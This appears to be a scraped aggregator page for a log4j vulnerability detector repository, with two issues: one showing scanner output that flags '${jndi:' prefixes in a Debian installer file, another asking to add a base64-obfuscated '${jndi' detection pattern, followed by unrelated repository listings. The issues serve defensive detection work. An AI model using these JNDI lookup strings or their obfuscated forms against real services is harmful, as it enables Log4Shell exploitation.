    [!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 58910 DEOBFUSCATED_STRING: ${jndi:nis: LINE: Extended_description-eo.UTF-8: Resumo de la nuna LVM-agordo:\n\n Liberaj Konkretaj Datumportiloj:  ${FREE_PVS}\n Uzataj Konktretaj Datumportiloj:  ${USED_PVS}\n Datumportilaj Grupoj:             ${VGS}\n Logikaj Datumportiloj:            ${LVS}
    
    [!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 65224 DEOBFUSCATED_STRING: ${jndi:rmi: LINE: Extended_description-ku.UTF-8: Cîhaza ku hatiye hilbijartin partîsiyonên ji bo cîhazên RAiD dihundirîne. Ew cîhaz û partîsiyon dê werin rakirin:\n\nCîhaza Software RAID li bêr rakirinê ye: ${REMOVED_DEVICES}\n\nPartition ji hêla van cîhazên RAID ve hat bikaranîn: ${REMOVED_PARTITIONS}\n\nNîşe: Her wisa evê her tim hemû daneyên li ser cîhazên RAID yên nivîsbarî jê bibe.
    [!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 58996 DEOBFUSCATED_STRING: ${jndi:nis: LINE: Extended_description-sl.UTF-8: Povzetek trenutne nastavitve LVM:\n\n Prosti fizični nosilci:  ${FREE_PVS}\n Uporabljeni fizični nosilci:  ${USED_PVS}\n Skupine nosilcev:          ${VGS}\n Logični nosilci:        ${LVS}
    [!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 58910 DEOBFUSCATED_STRING: ${jndi:nis: LINE: Extended_description-eo.UTF-8: Resumo de la nuna LVM-agordo:\n\n Liberaj Konkretaj Datumportiloj:  ${FREE_PVS}\n Uzataj Konktretaj Datumportiloj:  ${USED_PVS}\n Datumportilaj Grupoj:             ${VGS}\n Logikaj Datumportiloj:            ${LVS}
    
    [!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 65224 DEOBFUSCATED_STRING: ${jndi:dns: LINE: Extended_description-ku.UTF-8: Cîhaza ku hatiye hilbijartin partîsiyonên ji bo cîhazên RAiD dihundirîne. Ew cîhaz û partîsiyon dê werin rakirin:\n\nCîhaza Software RAID li bêr rakirinê ye: ${REMOVED_DEVICES}\n\nPartition ji hêla van cîhazên RAID ve hat bikaranîn: ${REMOVED_PARTITIONS}\n\nNîşe: Her wisa evê her tim hemû daneyên li ser cîhazên RAID yên nivîsbarî jê bibe.
    [!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 58996 DEOBFUSCATED_STRING: ${jndi:nis: LINE: Extended_description-sl.UTF-8: Povzetek trenutne nastavitve LVM:\n\n Prosti fizični nosilci:  ${FREE_PVS}\n Uporabljeni fizični nosilci:  ${USED_PVS}\n Skupine nosilcev:          ${VGS}\n Logični nosilci:        ${LVS}
    [!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 58910 DEOBFUSCATED_STRING: ${jndi:dns: LINE: Extended_description-eo.UTF-8: Resumo de la nuna LVM-agordo:\n\n Liberaj Konkretaj Datumportiloj:  ${FREE_PVS}\n Uzataj Konktretaj Datumportiloj:  ${USED_PVS}\n Datumportilaj Grupoj:             ${VGS}\n Logikaj Datumportiloj:            ${LVS}
    

    In addition, the file has not been touched since 2015:

    -rw------- 1 root root 14M Mar 18  2015 /var/log/installer/cdebconf/templates.dat
    

    Everything else, including your quick tests to check for log4j (thanks very much for those, too!), indicates that our systems should hopefully be unaffected by the log4j vuln.

    Best wishes, Rob

    opened by rennis250 2
  • Add pattern '${base64:JHtqbmRp'

    Add pattern '${base64:JHtqbmRp'

    I request to add pattern ${base64:JHtqbmRp which is evaluated to ${jndi. I think with the current algorithm, the detector can not detect these kind of patterns.

    Ref https://github.com/SigmaHQ/sigma/blob/master/rules/web/web_cve_2021_44228_log4j_fields.yml#L40

    opened by baonq-me 7
Owner
Florian Roth
#DFIR #Python #YARA #Golang #SIEM #SOC #Sigma #Malware
Florian Roth
A whale detector design for the Kaggle whale-detector challenge!

CNN (InceptionV1) + STFT based Whale Detection Algorithm So, this repository is my PyTorch solution for the Kaggle whale-detection challenge. The obje

Tarin Ziyaee 92 Sep 28, 2021
Lane follower: Lane-detector (OpenCV) + Object-detector (YOLO5) + CAN-bus

Lane Follower This code is for the lane follower, including perception and control, as shown below. Environment Hardware Industrial Camera Intel-NUC(1

Siqi Fan 3 Jul 7, 2022
HeartRate detector with ArduinoandPython - Use Arduino and Python create a heartrate detector.

Syllabus of Contents Syllabus of Contents Introduction Of Project Features Develop With Python code introduction Installation License Developer Contac

null 1 Jan 5, 2022
Video lie detector using xgboost - A video lie detector using OpenFace and xgboost

video_lie_detector_using_xgboost a video lie detector using OpenFace and xgboost

null 2 Jan 11, 2022
Imposter-detector-2022 - HackED 2022 Team 3IQ - 2022 Imposter Detector

HackED 2022 Team 3IQ - 2022 Imposter Detector By Aneeljyot Alagh, Curtis Kan, Jo

Joshua Ji 3 Aug 20, 2022
Script that attempts to force M1 macs into RGB mode when used with monitors that are defaulting to YPbPr.

fix_m1_rgb Script that attempts to force M1 macs into RGB mode when used with monitors that are defaulting to YPbPr. No warranty provided for using th

Kevin Gao 116 Jan 1, 2023
A model that attempts to learn and benefit from data collected on card counting.

A model that attempts to learn and benefit from data collected on card counting. A decision tree like model is built to win more often than loose and increase the bet of the player appropriately to come out winning as much money as possible.

null 1 Dec 17, 2021
Exploration-Exploitation Dilemma Solving Methods

Exploration-Exploitation Dilemma Solving Methods Medium article for this repo - HERE In ths repo I implemented two techniques for tackling mentioned t

Aman Mishra 6 Jan 25, 2022
Generative Exploration and Exploitation - This is an improved version of GENE.

GENE This is an improved version of GENE. In the original version, the states are generated from the decoder of VAE. We have to check whether the gere

null 33 Mar 23, 2022
SSD: Single Shot MultiBox Detector pytorch implementation focusing on simplicity

SSD: Single Shot MultiBox Detector Introduction Here is my pytorch implementation of 2 models: SSD-Resnet50 and SSDLite-MobilenetV2.

Viet Nguyen 149 Jan 7, 2023
Official code of the paper "ReDet: A Rotation-equivariant Detector for Aerial Object Detection" (CVPR 2021)

ReDet: A Rotation-equivariant Detector for Aerial Object Detection ReDet: A Rotation-equivariant Detector for Aerial Object Detection (CVPR2021), Jiam

csuhan 334 Dec 23, 2022
Code for one-stage adaptive set-based HOI detector AS-Net.

AS-Net Code for one-stage adaptive set-based HOI detector AS-Net. Mingfei Chen*, Yue Liao*, Si Liu, Zhiyuan Chen, Fei Wang, Chen Qian. "Reformulating

Mingfei Chen 45 Dec 9, 2022
Code for "LoFTR: Detector-Free Local Feature Matching with Transformers", CVPR 2021

LoFTR: Detector-Free Local Feature Matching with Transformers Project Page | Paper LoFTR: Detector-Free Local Feature Matching with Transformers Jiami

ZJU3DV 1.4k Jan 4, 2023
Code repository for paper `Skeleton Merger: an Unsupervised Aligned Keypoint Detector`.

Skeleton Merger Skeleton Merger, an Unsupervised Aligned Keypoint Detector. The paper is available at https://arxiv.org/abs/2103.10814. A map of the r

北海若 48 Nov 14, 2022
YOLO5Face: Why Reinventing a Face Detector (https://arxiv.org/abs/2105.12931)

Introduction Yolov5-face is a real-time,high accuracy face detection. Performance Single Scale Inference on VGA resolution(max side is equal to 640 an

DeepCam Shenzhen 1.4k Jan 7, 2023
Deformable DETR is an efficient and fast-converging end-to-end object detector.

Deformable DETR: Deformable Transformers for End-to-End Object Detection.

null 2k Jan 5, 2023
LoFTR:Detector-Free Local Feature Matching with Transformers CVPR 2021

LoFTR-with-train-script LoFTR:Detector-Free Local Feature Matching with Transformers CVPR 2021 (with train script --- unofficial ---). About Megadepth

Nan Xiaohu 15 Nov 4, 2022
Official Implementation of DDOD (Disentangle your Dense Object Detector), ACM MM2021

Disentangle Your Dense Object Detector This repo contains the supported code and configuration files to reproduce object detection results of Disentan

loveSnowBest 51 Jan 7, 2023
LiDAR R-CNN: An Efficient and Universal 3D Object Detector

LiDAR R-CNN: An Efficient and Universal 3D Object Detector Introduction This is the official code of LiDAR R-CNN: An Efficient and Universal 3D Object

TuSimple 295 Jan 5, 2023